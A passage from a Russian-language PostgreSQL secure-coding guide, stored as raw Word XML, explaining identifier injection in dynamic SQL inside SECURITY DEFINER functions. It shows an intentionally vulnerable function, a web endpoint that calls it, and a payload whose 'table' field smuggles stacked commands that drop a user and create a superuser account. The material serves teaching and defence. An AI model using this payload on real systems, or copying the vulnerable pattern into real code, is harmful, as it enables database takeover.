        <w:t>•   depesz blog: «Why prefer format() over ||-concat» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD009AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «SQL Injection Prevention Cheat Sheet» — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F7948" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Don't Do This» / Dynamic SQL antipatterns — https://wiki.postgresql.org/wiki/Don't_Do_This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC6D4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL — комбо</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA6BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Самая опасная конфигурация identifier-injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic SQL внутри SECURITY DEFINER функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. SECURITY DEFINER переключает context на owner функции; dynamic SQL без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/USING позволяет injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сочетание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> означает, что любая injection-точка в теле функции исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с правами owner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, типично </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">superuser или DBA. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>эскалация по двум осям одновременно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: (1) identifier-injection (3.16.1–3.16.4) + (2) privilege escalation (3.13.6 — параллельный класс через search_path в SECURITY DEFINER). Граница с 3.13.6: 3.13.6 — hijack unqualified-имени </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без injection в SQL-text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через подмену функции в pg_temp); 3.16.5 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>прямая injection в SQL-text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dynamic SQL под privileged context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32C9E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если SECURITY DEFINER функция уязвима к identifier-injection — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatic privilege escalation chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: payload получает права owner-а, без необходимости в отдельных prior escalation steps. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>самый частый realistic source RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в production-PostgreSQL: разработчик создаёт «utility»-функцию для admin-tasks с SECURITY DEFINER (потому что она должна работать под superuser), забывает про identifier-injection — и атакующий с обычной EXECUTE-привилегией получает full DBA-control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378AA3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5727C1A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- "Utility" функция для tenant-admin tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CCED4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Owner: postgres (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D76678" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- USAGE на функцию выдан application_admin role (не superuser, но admin своих tenant-schemas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082E010" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA90D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F274F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_schema text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D4BA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    target_table text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBC9CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200923D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B11107" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7012D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER       -- ← critical: исполняется под postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124E7B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ВНИМАНИЕ: SET search_path отсутствует — также уязвимо к 3.13.6!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD99B63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B0B3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B210B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- АНТИПАТТЕРН: identifier через f-string-style concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F5C78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE 'ANALYZE ' || tenant_schema || '.' || target_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B2748" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE 'REINDEX TABLE ' || tenant_schema || '.' || target_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FEDE21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C8430" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187E400" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542C78A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- GRANT EXECUTE ON FUNCTION admin.refresh_tenant_stats(text, text) TO application_admin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDD66B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сценарий: разработчик хотел дать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возможность запускать ANALYZE/REINDEX на своих tenant-таблицах (что требует superuser в стандартном PG до 17). SECURITY DEFINER позволяет: caller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запускает функцию, тело исполняется под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Identifier-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE как superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847A62E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF0E59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/refresh-stats")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F964BCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def refresh_stats(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E66DF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A152738" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E79AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_admin_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE654A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0D5B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73EE34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT admin.refresh_tenant_stats(:t, :tbl)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60860C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"t": tenant, "tbl": table},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EA2B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280459E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "refreshed"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA11EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — RCE как superuser через identifier-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E28C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Вариант A — stacked DROP под superuser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF5446" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010F68B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"tenant": "tenant_42", "table": "users; DROP USER application_user; CREATE USER attacker SUPERUSER LOGIN PASSWORD 'p4ssw0rd'; --"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF08BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутри функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F171F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE tenant_42.users; DROP USER application_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676DFA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER attacker SUPERUSER LOGIN PASSWORD 'p4ssw0rd'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E9F8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
